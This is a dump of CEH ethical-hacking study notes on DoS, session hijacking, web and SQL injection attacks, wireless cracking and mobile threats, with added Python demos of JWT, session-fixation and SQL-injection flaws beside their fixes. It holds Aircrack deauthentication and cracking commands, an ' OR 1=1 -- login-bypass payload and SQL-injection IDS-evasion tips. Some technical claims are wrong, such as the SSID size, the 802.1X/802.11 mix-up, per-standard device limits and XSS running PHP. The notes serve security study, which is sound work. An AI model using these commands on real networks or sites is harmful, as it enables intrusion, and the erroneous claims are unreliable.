Affected hardware requires replacement or re-installation of its firmware/software.
**Distributed Reflection Denial of Service (DRDoS)**
The attacker uses intermediary victims that reflect the traffic towards a secondary victim.
The secondary victim forwards the traffic to the target.
The intermediary and secondary victims hide the true origin of the attack.
**Botnet**
The attacker compromises victims to make bots, which compromise further systems to build a botnet.
Botnets are controlled by a **Command and Control server** owned by the attacker.
This server is used to send the instructions to perform the attack.

# Tools
- Ping command
- Nmap DoS script
- Hping3
- LOIC - Low Orbit Ion Cannon
- MSF auxiliary modules
- HULK - GitHub

# Preventive Measures
- Use load balancers.
- Protect your network with a network firewall, IDS / IPS.
- Implement a Web Application Firewall.
66 | - Take Help from Cloud, they have more bandwidth than an enterprise would, which can help in large volumetric attacks. 67 | -------------------------------------------------------------------------------- /Module 11 - Session Hijacking/Session Hijacking.md: -------------------------------------------------------------------------------- 1 | # Session Hijacking - Session Hijacking is the process of taking control of an active session over active User. 2 | -------------------------------------------------------------------------------- 3 | # What is a Sessions ID 4 | -> After Validating user with on basis of username and password, server assign him a string value called **Session ID** 5 | -> These Session ID's are used to identify USERs. 6 | -> After Validating user's credentials a fresh Session ID is assigned to User Every time. 7 | -> This Session ID is Stored in Form of Cookies on User's Browser. 8 | -------------------------------------------------------------------------------- 9 | # Cookies 10 | -> Cookies are the values which help server to validate requests for each user or session 11 | -> Cookies Contain User Identity Details, Personalization, and other information used to identify user and computer on network. 12 | -------------------------------------------------------------------------------- 13 | # Cookie vs Tokens 14 | - Cookies -> Cookies are stored on Both Server Side and Client Side. 15 | Cookies are just String Values that are validated by comparison. 16 | - Tokens -> Tokens are Stored on Client Side only. 17 | Normal JWT (JSON Web Token) comprised of **Header.Payload.Signature** 3 concatenated Base64url-encoded Strings, separated by (.) 
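The Header.Payload.Signature structure just described is only as strong as the verifier: the signature must be recomputed by the server with its own fixed algorithm and key, and the `alg` field in the token's header must be checked, not obeyed, or an attacker simply rewrites it to `none` and drops the signature. The following is an added example for these notes, not code from the CEH material; it uses only the standard library, and the key and claims are constructed for the demo.

```python
"""Issue and verify an HS256 JWT (Header.Payload.Signature) and show the
alg-none forgery that a correct verifier must reject. Added example for these
notes, not from the CEH material; key and claims are constructed."""
import base64
import hashlib
import hmac
import json
import time


def b64url_encode(raw):
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_segment(obj):
    """One JSON object -> one dot-separated token segment."""
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def sign_hs256(payload, key):
    """Issue a token: HMAC-SHA256 over the ASCII 'header.payload' string."""
    signing_input = encode_segment({"alg": "HS256", "typ": "JWT"}) + "." + encode_segment(payload)
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token, key, now=None):
    """Return the payload if the token is valid, otherwise raise ValueError.
    The server decides the algorithm: a header saying 'none' or anything other
    than HS256 is rejected before the signature is even looked at."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("token must have exactly three segments")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):   # constant-time compare
        raise ValueError("bad signature")
    payload = json.loads(b64url_decode(p))
    now = time.time() if now is None else now
    if "exp" in payload and payload["exp"] <= now:
        raise ValueError("token expired")
    return payload


def is_valid(token, key, now=None):
    try:
        verify_hs256(token, key, now)
        return True
    except (ValueError, TypeError):   # binascii and JSON errors are ValueError subclasses
        return False


def forge_alg_none(token, new_payload):
    """What an attacker tries against a naive verifier: header alg 'none',
    attacker-chosen claims, and an empty signature segment."""
    return encode_segment({"alg": "none", "typ": "JWT"}) + "." + encode_segment(new_payload) + "."


if __name__ == "__main__":
    KEY = b"demo-secret-do-not-use"   # constructed
    tok = sign_hs256({"sub": "alice", "role": "user", "exp": 2_000_000_000}, KEY)
    print(tok)
    print("genuine token valid:", is_valid(tok, KEY, now=1_700_000_000))
    print("alg=none forgery accepted:", is_valid(forge_alg_none(tok, {"sub": "admin"}), KEY))
```

Contrast this with the cookie case described above: a session cookie is an opaque random string the server looks up, so "validation by comparison" needs no cryptography but does need server-side state; a token carries its own claims and is trusted only because the signature verifies, which is why the verifier's algorithm handling is the whole security boundary.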
18 | -------------------------------------------------------------------------------- 19 | # Session Hijacking Concept 20 | -------------------------------------------------------------------------------- 21 | # Why Session Hijacking Works 22 | -> Insecure Session Handling 23 | -> Insecure Session Termination 24 | -> Weak Session ID generation algorithms - linear algo. used such as time or IP address for generating session ID. 25 | -> Unencrypted Session ID's 26 | ---------------------------------------------------------------------------------- 27 | # Types of Session Hijacking 28 | - Active -> In Active Session Hijacking, Attacker steal Session Cookies from victim's Browser and use those cookies. Also known Application-Level Hijacking. 29 | - Passive -> A passive Attack uses sniffers on the network, allowing attacker to obtain info. to log on as a valid user and enjoy the privileges. Also called Network-Level Hijacking. 30 | ---------------------------------------------------------------------------------- 31 | # Methods to obtain Session ID 32 | -> Predict Session 33 | -> MITM = Man In The Middle Attack 34 | -> MITB = Man In The Browser Attack => Hijack Victims Browser - BeEF 35 | -> Network Sniffing 36 | -> Malware Attack 37 | -> XSS = Cross-Site Scripting => Executing Malicious Script to fetch User Cookies, when Victim Browse a Website script executes and Attacker get Session ID. 38 | -> Proxy Server => Attacker user their System as a Proxy Server for Victim so that all the traffic pass through their machine, and they can extract juicy info from requests and responses. 39 | ---------------------------------------------------------------------------------- 40 | # Session Hijacking vs Spoofing 41 | - Spoofing -> In Spoofing, Attacker Steal User Credentials and initiate a new session. 42 | - Hijacking -> In Hijacking, Attacker Steal Active Session ID's and Use those Session ID's. 
43 | ---------------------------------------------------------------------------------- 44 | # Session Related Attacks 45 | -> IDOR -> Insecure Direct Object Reference => Attacker Modify Session ID's to gain access over other active Session. Attacker do this by analyzing the Session ID's format. 46 | -> Session Fixation Attack 47 | => Vulnerability => Session ID is assigned before validating user credentials. 48 | => Session ID is not modified after validating user Credentials. 49 | => How Attacker Exploit => Attacker Open the website, and copy session ID(12345678) from there, and send URL with this Session ID to victim. 50 | => when Victim open and validate the credentials, then server consider requests with that session ID(12345678) as Actual User's request. 51 | => After user login, Attacker simply refresh the page and in response server send actual users details. 52 | -> Browser Back Attack 53 | => Vulnerability => Session is not expired from server side after user logout. 54 | -> Cookie Replay Attack 55 | => Vulnerability => Cookies from last Session can be used to initiate new Sessions. 
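The session fixation, browser Back and cookie replay items above share one root cause: the server trusts a session ID it did not freshly issue after authentication, or keeps honouring one after logout. The following in-memory session store is an added example for these notes, not from the CEH material; it puts the vulnerable login next to the fixed one and replays the fixation scenario from the list (attacker plants ID, victim logs in with it, attacker reuses it). The store is a plain dict standing in for a real session backend.

```python
"""Server-side session handling: the session fixation flaw beside its fixes
(CSPRNG IDs, regenerate the ID after login, expire and destroy on the server).
Added example for these notes, not from the CEH material."""
import secrets
import time


class SessionStore:
    def __init__(self, ttl=900):
        self.ttl = ttl
        self._sessions = {}   # sid -> {"user": str or None, "expires": float}

    def _now(self, now):
        return time.time() if now is None else now

    def new(self, now=None):
        """Fresh pre-authentication session. 32 bytes from the OS CSPRNG, not a
        counter, timestamp or IP address, so the ID cannot be predicted."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "expires": self._now(now) + self.ttl}
        return sid

    def user(self, sid, now=None):
        """Who owns this session, or None if it is unknown, expired or logged out."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if s["expires"] <= self._now(now):
            del self._sessions[sid]          # expiry enforced on the server, not by a cookie date
            return None
        return s["user"]

    def login_vulnerable(self, sid, username, now=None):
        """FLAW: the session ID the client presented before login is kept and
        bound to the user; whoever planted that ID now owns the authenticated
        session. It even accepts an ID it never issued."""
        if sid not in self._sessions:
            self._sessions[sid] = {"user": None, "expires": self._now(now) + self.ttl}
        self._sessions[sid]["user"] = username
        return sid

    def login_fixed(self, sid, username, now=None):
        """FIX: discard the pre-auth session and issue a brand-new ID only after
        the credentials have been verified."""
        self._sessions.pop(sid, None)
        new_sid = self.new(now)
        self._sessions[new_sid]["user"] = username
        return new_sid

    def logout(self, sid):
        """Destroy the session on the server, so the old cookie is useless
        afterwards (browser Back button, cookie replay)."""
        self._sessions.pop(sid, None)


def fixation_succeeds(fixed):
    """Replay the attack from the notes: the attacker obtains an ID from the site,
    gets the victim to log in with it, then checks whether that ID is now the
    victim's authenticated session."""
    store = SessionStore()
    planted = store.new()                      # attacker's ID, delivered to the victim in a URL
    login = store.login_fixed if fixed else store.login_vulnerable
    login(planted, "victim")                   # victim authenticates while presenting the planted ID
    return store.user(planted) == "victim"


if __name__ == "__main__":
    print("fixation works against vulnerable login:", fixation_succeeds(fixed=False))
    print("fixation works against fixed login:", fixation_succeeds(fixed=True))
```

Against `login_vulnerable` the attacker's planted ID becomes the victim's session; against `login_fixed` it is discarded and the attacker holds a dead ID. Pairing the regenerated ID with server-side invalidation at logout and a server-enforced expiry covers the other two attacks in the list without relying on anything the browser does.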
56 | ---------------------------------------------------------------------------------- 57 | # Session Hijacking Tools 58 | -> Burp Suite 59 | -> OWASP ZAP 60 | -> Bettercap 61 | -> SSL Strip 62 | -> DroidSheep 63 | -> Droidsniff 64 | -> Faceniff 65 | ---------------------------------------------------------------------------------- 66 | # Protection Against Session Hijacking 67 | -> Use SSH to create secure communication Channel 68 | -> Pass Authentication cookie over HTTPS Connection 69 | -> Generate Session ID After Verifying credentials 70 | -> Use Encryption Over Data and cookies 71 | -> Use Lengthy Session-ID's 72 | -> Set Low Timeout for session expiration 73 | -> Use Strong Authentication like Kerbros 74 | -> Check Website Certificates 75 | -> Use Secure Protocol 76 | ---------------------------------------------------------------------------------- 77 | -------------------------------------------------------------------------------- /Module 12 - Evading IDS, Firewall and HoneyPots/Module 12 - IDS, FIREWALL AND HONEYPOTS.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SNGWN/CEH-Notes/b456452938ea58dfaa7cbbfa1cbd33e641374b37/Module 12 - Evading IDS, Firewall and HoneyPots/Module 12 - IDS, FIREWALL AND HONEYPOTS.pdf -------------------------------------------------------------------------------- /Module 13 - Hacking web Servers/13_Hacking_Web_Servers.md: -------------------------------------------------------------------------------- 1 | # Web Server 2 | Web Servers are the programs that are used for hosting services. 3 | Web Servers are deployed on a separate web server hardware or installed on a host as a program. 4 | It delivers content over **Hyper Text Transfer Protocol** (HTTP). 5 | Web Servers support different types of application extensions whereas all of the support **Hypertext Markup Language** (HTML). 
6 | 7 | # Web Server Security Issue 8 | Web server vulnerabilities: 9 | - Improper permission of file directories 10 | - Default configurations 11 | - Enabling unnecessary services 12 | - Lack of security 13 | - Bugs 14 | - Misconfigured SSL certificate - Drown Attack 15 | - Enabled debugging 16 | 17 | # Open Source Web Servers 18 | - Apache HTTP Server 19 | - Nginx 20 | - Apache Tomcat 21 | 22 | # Web Server Attacks 23 | # DoS/DDoS 24 | # DNS Server Hijacking 25 | 26 | # Directory Traversal Attacks 27 | Attacker using trials and error method to access restricted directories to reveal sensitive information. 28 | 29 | # Man-in-the-Middle / Sniffing Attacks 30 | # Phishing Attacks 31 | # Website Defacement 32 | After a successful intrusion, attacker alters and modify the content of the website. 33 | # Webserver Misconfiguration 34 | Attacker looks for misconfigurations and vulnerabilities to exploit. 35 | # Web Cache Poisoning Attack 36 | The attacker wipe the actual cache of the webserver and sending crafted request to store fake entries. 37 | 38 | # Web Application Attacks 39 | - Cookie Tampering 40 | - DoS 41 | - SQL Injection 42 | - Session Hijacking 43 | - Cross-Site Request Forgery (CSRF) 44 | - Cross-Site Scripting (XSS) 45 | - Buffer Overflow 46 | 47 | # Attack Methodology 48 | # Information Gathering 49 | Collecting information from internet. 50 | # robots.txt 51 | Attacker extract information about internal files. 52 | # Web Server Footprinting 53 | Results the server name, type, OS, applications, etc. 54 | 55 | # Mirroring a website 56 | Download the website, to inspect offline, without any interaction to the target. 57 | Tool: 58 | - httrack 59 | - Wget - wget --mirror 60 | 61 | # Vulnerability Scanning 62 | Automated tool to inspect website and detect vulnerabilities. 63 | These tools perform deep inspection of scripts, open ports, banners, etc. 
Tools:
- OWASP ZAP
- OpenVAS
- Nessus
- Qualys
- Crash Test
- Burp Suite Pro

# Hacking Web Passwords
Extracting passwords to gain access to the system.
Passwords may be obtained through social engineering, tampering with the communication, etc.

# Countermeasures
- Place the web server in a secure zone (behind firewall, IDS, IPS; in a DMZ)
- Detect potential changes (file hashing, scripts to detect changes)
- Disable insecure and unnecessary ports and services
- Use port 443 (HTTPS) instead of port 80 (HTTP)
- Encrypt traffic
- Keep software updated
- Disable default accounts

# Patch Management
**Patch Management** is the (usually automated) process of detecting missing security patches, finding solutions, downloading the patches, testing them in an isolated environment and then deploying them onto the systems.
--------------------------------------------------------------------------------
/Module 14 - Web Application/14_Hacking_Web_Applications.md:
--------------------------------------------------------------------------------
## Terminology
**Web Applications** are applications that run on a remote application server and are available to clients over the internet.
**Server Administrators** are responsible for the web server's safety, speed, functioning and performance.
**Application Administrators** are responsible for the management and configuration required by the web application.
**Clients** are the endpoints that interact with the web application / server.

## How Web Applications work?
**Front-end** <-> **Back-end**
Users interact with the front-end.
Processing is controlled and performed by the back-end.

# Server-side languages:
- PHP - PHP: Hypertext Preprocessor
- Java
- C# - C-Sharp
- Python
- JavaScript (Node.js)
- many more...
# Client-side languages:
- CSS - Cascading Style Sheets
- JavaScript
- HTML

# Web Application Threats
- **Insecure storage** - sensitive data is stored on the client side in plain text.
- **Information leakage** - sensitive data is leaked unintentionally (error messages, comments, headers).
- **Directory traversal** - an end user is able to traverse the server's directories outside the web root.
- **Parameter/Form tampering** - modifying parameter values.
- **DoS attack**
- **Buffer overflow** - overflowing a server-side buffer with junk in order to inject a payload.
- **SQL injection** - injecting SQL through parameter fields or the URL.
- **Cross-site scripting (XSS)** - injecting client-side script (JavaScript/HTML) that runs in other users' browsers; server-side languages such as PHP are not what XSS executes.
- **Security misconfiguration** - misconfigured server (default accounts, unwanted services, default passwords, debugging enabled, insecure exception handling).
- **Broken session management**
- **Session hijacking**

# Unvalidated input - Attack through user INPUT
Processing non-validated input from the client on the back-end. This is a major vulnerability and the basis of the injection attacks (SQL injection, XSS, buffer overflow).

# Parameter / Form Tampering
Parameter tampering is an attack in which the attacker manipulates the parameters exchanged between client and server. Parameters such as the **Uniform Resource Locator** (URL) or web page form fields are modified (cookies, HTTP headers, form fields, hidden fields).

# SQL Injection
Injection of malicious SQL queries.
The attacker can read or manipulate the database.
These vulnerabilities can be detected with an automated scanner or by manual testing.

# DoS Attack
- **User Registration DoS**: an automated process keeps registering fake accounts.
- **Login DoS**: the attacker keeps sending login requests.
- **User Enumeration**: the attacker uses differing login responses to confirm which usernames exist, then feeds them to a dictionary attack.
54 | - **Account Lock** : attacker attempt to lock the user account by attempting invalid passwords. 55 | 56 | # Web Application Hacking Methodology 57 | # Analyze Web Application 58 | - Observing functionality 59 | - Identify vulnerabilities, entry points, servers 60 | - HTTP request analyze 61 | - Hidden content discovery - Directories, Subdomain, parameters 62 | ************************************************************************************** 63 | # Attack Authentication 64 | Exploit the authentication mechanism: 65 | - Username enumerate 66 | - Cookie exploitation 67 | - Session attacks 68 | - Password attacks 69 | **----------------------------------------------------------------------------------** 70 | # Session Management Attack 71 | 1. Impersonate a legitimate user. - Spoofing 72 | 2. Session hijacking techniques: - Cookie Stealing 73 | - Session token prediction 74 | - Session token tampering - IDOR - INSECURE DIRECT OBJECT REFERNCE 75 | - Session replay 76 | 77 | # Injection Attacks 78 | Inject malicious code, commands and files. 79 | Techniques: 80 | - Web Script injection - Injecting PHP, HTML or other languages scripts 81 | - OS Command injection - Inject OS command 82 | - SQL injection - Inject SQL Query 83 | - Buffer Overflow - Inject JUNK and PAYLOAD for Buffer Overflow attack 84 | **----------------------------------------------------------------------------------** 85 | # Countermeasures 86 | **-------------** 87 | # Percent Encoding 88 | [Percent Encoding](https://en.wikipedia.org/wiki/Percent-encoding) or URL Encoding is a technique for 89 | secure handling of URL by replaces unsafe and non-ascii characters with % followed by two hexadecimal 90 | digits. 91 | Example: 92 | **%20 or + both are used for SPACE** 93 | 94 | In URL:, there are some reserved character such as '/' that is used to separate paths in URL. To use this not as separator, then it must be encoded. 
**%2F is used for '/'**

- **Full list of percent-encoded characters**
  [here](https://www.degraeve.com/reference/urlencoding.php)

# HTML Encoding - HTML encoding specifies how special characters will be shown.
**----------------------------------------------------------------------------------**
# SQL Injection Countermeasures
- Input validation
- Customized error messages
- Monitoring database traffic
- Limit the length of user input

# XSS Attack Countermeasures
- Testing tools
- Filtering output
- Validated INPUT

# Other Countermeasures
- Dynamic testing - testing through automated tools
- Source code analysis - analyze the source code
- Strong cryptography - use strong encryption and hashing algorithms
- Use TLS over SSL - use TLS 1.3 or TLS 1.2 over the deprecated TLS 1.1 or SSL
- Cookie timeout
**----------------------------------------------------------------------------------**
**----------------------------------------------------------------------------------**
# OWASP Top 10
1. **Injection** -> inject malicious commands, scripts, queries, etc.
2. **Broken Authentication**
3. **Sensitive Data Exposure**
4. **XXE (XML External Entity)** -> vulnerable when XML data from an untrusted source is processed.
5. **Broken Access Control**
6. **Security Misconfiguration**
7. **Cross-Site Scripting** -> executing JavaScript, PHP or any language code on the victim side is known as Cross-Site Scripting.
8. **Insecure Deserialization** -> deserialization is the reverse process where the byte stream is used to recreate the actual Java object in memory.
9. **Using Components With Known Vulnerabilities**
10. **Insufficient Logging and Monitoring**
**----------------------------------------------------------------------------------**
**----------------------------------------------------------------------------------**
--------------------------------------------------------------------------------
/Module 15 - SQL Injection/15_SQL_Injection.md:
--------------------------------------------------------------------------------
# Terminology
The intention of SQL injection is to reveal or manipulate sensitive information in the database by injecting commands into existing queries.
- Bypassing authentication
- Revealing sensitive information
- Compromising data integrity
- Erasing the database

# Tools
- sqlmap

# SQL
**SQL** stands for **S**tructured **Q**uery **L**anguage.

# Types of SQL Injection
# **In-Band SQL Injection**
Uses the same communication channel to launch the attack and get the result.
# **Error-Based SQL Injection**
- The server throws an error message.
- Error messages are useful during development, but should be disabled when the application is live.

# Techniques to perform SQL Injection
- End-of-line comment - comment out the rest of the query using comment syntax.
- Illegal / logically incorrect query - send an incorrect query.
- Tautology (something that is inherently true, like `" OR 1=1`)

# Union SQL Injection
Involves the **UNION** SQL operator, to combine the queries.
**Select the `password` from `table1` and `table2` using UNION:**

    SELECT password FROM table1
    UNION
    SELECT password FROM table2

# Inferential SQL Injection
- Known as **Blind SQL Injection**
- No data is transferred via the application; the attacker sends payloads, then observes the web application's response and behavior.
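The tautology and end-of-line-comment techniques above, shown against a string-built login query and then against its parameterized fix, as an added example that is not part of the original notes. It runs against an in-memory SQLite database with a constructed `users` table; the function names (`make_db`, `login_vulnerable`, `login_safe`, `validate_username`, `error_leak`) are hypothetical.

```python
"""SQL injection: string-built query beside its parameterized fix.

Added example, not part of the original CEH notes. Runs offline against
an in-memory SQLite database; the users table, its rows and all function
names are constructed for this illustration.
"""
import hashlib
import re
import sqlite3

# Allow-list for usernames: letters, digits, '_', '.', '-', 1 to 32 chars.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def pw_hash(password: str) -> str:
    # Plain SHA-256 keeps the example self-contained; a real system would
    # use a salted, slow password hash (bcrypt, scrypt or Argon2).
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Create the constructed sample database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY,"
        " username TEXT UNIQUE NOT NULL, pw_hash TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO users (username, pw_hash) VALUES (?, ?)",
        [("alice", pw_hash("correct horse")), ("bob", pw_hash("battery staple"))],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """BAD: untrusted input is concatenated into the query text.

    A username of  ' OR 1=1 --  turns the WHERE clause into a tautology and
    comments out the password check, so the first user row is returned.
    """
    query = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND pw_hash = '" + pw_hash(password) + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """GOOD: the query text is fixed; values travel as bound parameters.

    The driver never interprets a parameter as SQL, so the same payload is
    just a (non-existent) username and the login fails.
    """
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash(password)),
    ).fetchone()
    return row is not None


def validate_username(username: str) -> bool:
    """Defence in depth: allow-list the characters and limit the length
    (the notes' 'input validation' and 'limit length of user input')."""
    return USERNAME_RE.fullmatch(username) is not None


def error_leak(conn: sqlite3.Connection, username: str) -> str:
    """Return the raw database error the vulnerable code would expose.

    An unmatched quote makes the concatenated query malformed; echoing the
    driver's message to the client is what error-based injection relies
    on, which is why error messages should be customized in production.
    """
    try:
        login_vulnerable(conn, username, "irrelevant")
    except sqlite3.Error as exc:
        return str(exc)
    return ""


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"
    print("vulnerable, tautology :", login_vulnerable(db, payload, "x"))  # True
    print("parameterized, same   :", login_safe(db, payload, "x"))        # False
    print("allow-list accepts it :", validate_username(payload))         # False
    print("leaked error          :", error_leak(db, "o'brien"))
```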
# Boolean-based Blind SQL Injection
Sending an SQL query to the database that produces a different result depending on whether the query returns TRUE or FALSE; the HTTP response will change or remain the same accordingly.

This type of attack is slow: the attacker needs to enumerate the database character by character.

# Time-based Blind SQL Injection
The attacker sends a query that forces the database to wait for a specified time before responding.
The response time indicates whether the query is TRUE or FALSE.

# Out-of-band SQL Injection
Depends on features enabled on the database server (DNS, HTTP requests), so it is not a very common attack.

Uses a different channel to launch the attack.

# SQL Injection Methodology
# Information Gathering And Vulnerability Detection

- Collect information about the web application, server, OS, database, ...
- Identify vulnerabilities
- Evaluate input fields

### Launch Attack

- Select the appropriate type of SQL injection, based on the gathered information

## Advanced SQL Injection

- Enumerate the database (PostgreSQL, MySQL, Oracle, ...)
- Identify the privilege level of users
- Grab passwords and hashes
- Transfer the database to a remote machine

## Evasion Techniques

### Evading IDS

- Inserting inline comments between keywords
- Character encoding
- String concatenation
- Obfuscated code
- Manipulating white space
- Hex encoding
- Sophisticated matches

## Countermeasures

- Penetration testing (manual, with tools)
- Source code analysis
- Web Application Firewall (WAF)
- Remove debugging messages
- Database account with minimal privileges
- Input validation
- Filter data
- Customize error messages
- IDS
--------------------------------------------------------------------------------
/Module 16 - Wireless Networks/16_Hacking_Wireless_Networks.md:
--------------------------------------------------------------------------------
# Terms
A **wireless network** is a computer network that uses wireless data connections between network nodes.
**Access Point**: An Access Point (AP) or Wireless Access Point (WAP) is a hardware device that provides wireless connectivity to end devices.
**Service Set Identifier (SSID)**: A 32-bit identification string of the Access Point, the AP's name. The SSID is inserted into the header of every data packet.
**Basic Service Set Identifier (BSSID)**: MAC address of the Access Point.

# Wi-Fi
Wi-Fi is a local area networking technology based on the IEEE 802.11 standard.
Wi-Fi stands for Wireless Fidelity.
In 1999, six companies came together and formed a global non-profit association to promote a new wireless networking technology, regardless of brand.
In 2000, the group adopted the term **Wi-Fi** for its technical work and announced its official name, **Wi-Fi Alliance**.
# Wireless Standards
**802.1X** is a set of standards with rules that allow wired and wireless peripherals to work with each other, like a mobile with a router, a computer with a router, etc. There are different sub-protocols in the 802.11 family, categorized by their frequency and modulation technique.

| Protocol  | Frequency  | Max Data Speed |
|:---------:|:----------:|:--------------:|
| 802.11a   | 5 GHz      | 54 Mbps        |
| 802.11b   | 2.4 GHz    | 11 Mbps        |
| 802.11g   | 2.4 GHz    | 54 Mbps        |
| 802.11n   | 2.4/5 GHz  | 450 Mbps       |
| 802.11ac  | 5 GHz      | 866.7 Mbps     |

-> **802.11n can handle a single device at a time**
-> **802.11ac can handle 4 devices at a time**

# Wi-Fi latest versions and their speed
| Protocol  | Version  | Speed    |
|:---------:|:--------:|:--------:|
| 802.11n   | Wi-Fi 4  | 600 Mb/s |
| 802.11ac  | Wi-Fi 5  | 3.5 Gb/s |
| 802.11ax  | Wi-Fi 6  | 9.6 Gb/s |

-> **802.11n is renamed Wi-Fi 4**
-> **802.11ac is renamed Wi-Fi 5**
-> **802.11ax (Wi-Fi 6) is the latest and fastest we can use; it can handle 8 devices at a time**

# Authentication Process
**Open System Authentication** - In Open System Authentication, the client sends an authentication request from the device that contains the Station ID (typically the MAC address), and receives an authentication response from the AP/router with a success or failure message.
**Shared Key Authentication** - In Shared Key Authentication, a shared key, or passphrase, is manually set on both the mobile device and the AP/router for comparison. Authentication depends on the match result.

# Wardriving
Wardriving is the act of searching for Wi-Fi wireless networks by a person, usually in a moving vehicle, using a laptop or smartphone.
# Types of Wireless Antennas
# Directional Antenna
Directional antennas are designed to function in a specific direction to improve efficiency.
Use case: dish antennas
# Omnidirectional Antennas
An omnidirectional antenna radiates equal radio power in all directions.
Use cases: radio broadcasting, cell phones, GPS
--------------------------------------------------------------------------------------------------------------
## Wireless Encryption

# Wired Equivalent Privacy (WEP) - 1997
- Designed to provide the same level of security as that of a wired LAN
- WEP was the standard protocol before 2004
- Uses a pre-shared key, and plain text transmission.

# Wi-Fi Protected Access (WPA) - 2003 by the Wi-Fi Alliance
- Used for WLAN networks based on 802.11i
- Uses a RADIUS (**Remote Authentication Dial-In User Service**) server
- Only feasible for corporate giants who can set up their own server, not feasible for normal users

# WPA2 - 2004
- Strong encryption: AES (Advanced Encryption Standard) - 128-256 bit key
- In WPA2, when a user tries to connect with the AP/router, the key is encrypted by AES and then transmitted.

# Wireless Threats
- **Access Control Attacks** : evading access control parameters (MAC spoofing)
- **Confidentiality Attacks** : traffic analysis, session hijacking, MITM, etc.
- **Availability Attacks** : prevent users from accessing the wireless network (flooding, ARP poisoning, de-authentication attacks)
- **Authentication Attacks** : steal identity information or impersonate clients (password cracking, password guessing)
- **Rogue Access Point** : a fake access point placed alongside the legitimate one, with the same SSID, to monitor victims' activity by sniffing packets.
- **Misconfigured Access Point Attacks** : default or weak passwords, open authentication
- **Jamming Signal Attacks** : jamming or blocking the wireless communication, causing a denial of service
--------------------------------------------------------------------------------------------------------------
# Hacking Methodology

# Wi-Fi Discovery
- Passive footprinting (sniffing packets)
- Active footprinting (probing the AP to get information)

# Wireless Traffic Analysis
- Capture packets to reveal any information (SSID, authentication method, ...)

# Launch Attacks
- ARP poisoning - poisoning the ARP cache of the target machine, so that the attacker's AP/router sends the victim's traffic to the attacker.
- MAC spoofing - using a false MAC address
- The attacker sends de-authentication requests with spoofed
- Rogue access point - installing a rogue access point in a secure network without authorization of the network admin.
- MITM - Man-in-the-Middle attacks.
# Wireless Security Tools
# Wireless Intrusion Prevention System (WIPS)
- Monitors the wireless network
- Protects against unauthorized access points
- Performs automatic intrusion prevention
- Monitors the radio spectrum to prevent rogue access points and alerts the network administrator
- Can detect AP misconfiguration
- Detects honeypots
- Mitigates DoS

# Wi-Fi Countermeasures
- Change default parameters
- Disable remote login to wireless devices
- Use strong passwords - use passphrases
- Use the latest standards (WPA2 AES)
- MAC filtering
- Update software often
- Enable firewall
--------------------------------------------------------------------------------------------------------------
# Aircrack Suite
- Airmon-ng
- Airodump-ng
- Aireplay-ng
- Aircrack-ng

-> **airmon-ng start ** // Use that interface for network monitoring
-> **airmon-ng check kill** // Kill processes which may cause trouble
-> **airodump-ng ** // We need the AP/router MAC address
-> **airodump-ng -w --bssid ** // Start capturing packets
-> **aireplay-ng --deauth 0 -a ** // Send de-authentication packets to the target access point
-> **aircrack-ng -w ** // This will prompt us for network selection. Try to crack the key with the help of a wordlist
--------------------------------------------------------------------------------------------------------------
# WiFiPhisher
This tool uses a phishing attack to get the Wi-Fi password.
- https://www.youtube.com/watch?v=8dhGWYCfrBc
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Module 16 - Wireless Networks/Infographic_20_years_of_Wi-Fi_0.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SNGWN/CEH-Notes/b456452938ea58dfaa7cbbfa1cbd33e641374b37/Module 16 - Wireless Networks/Infographic_20_years_of_Wi-Fi_0.pdf
--------------------------------------------------------------------------------
/Module 17 - Mobile Platform/17_Hacking_Mobile_Platforms.md:
--------------------------------------------------------------------------------
## Mobile Platform Attack Vectors

### OWASP Top 10 Mobile Threats

The [OWASP Mobile Security Project](https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks) maintains a list of the most common mobile security risks.

# Top Ten (2014)

1. Weak Server Side Controls
2. Insecure Data Storage
3. Insufficient Transport Layer Protection
4. Unintended Data Leakage
5. Poor Authorization and Authentication
6. Broken Cryptography
7. Client Side Injection
8. Security Decisions via Untrusted Inputs
9. Improper Session Handling
10. Lack of Binary Protections

# Top Ten (2016)

1. **Improper Platform Usage**: misuse of a platform feature or failure to use platform security controls
2. **Insecure Data Storage**: insecure data storage + unintended data leakage
3. **Insecure Communication**: poor handshaking, incorrect SSL, weak negotiation, cleartext communication of sensitive assets, ...
4. **Insecure Authentication**: captures notions of authenticating the end user or bad session management
5. **Insufficient Cryptography**: cryptography was attempted, but it wasn't done correctly
6. **Insecure Authorization**: captures any failures in authorization
7. **Client Code Quality**: all of the code-level implementation problems in the mobile client
8. **Code Tampering**: binary patching, local resource modification, method hooking, dynamic memory modification, ...
9. **Reverse Engineering**: analysis of the final core binary to determine the source code, libraries, ...
10. **Extraneous Functionality**: internal development security controls that are not intended to be released into a production environment

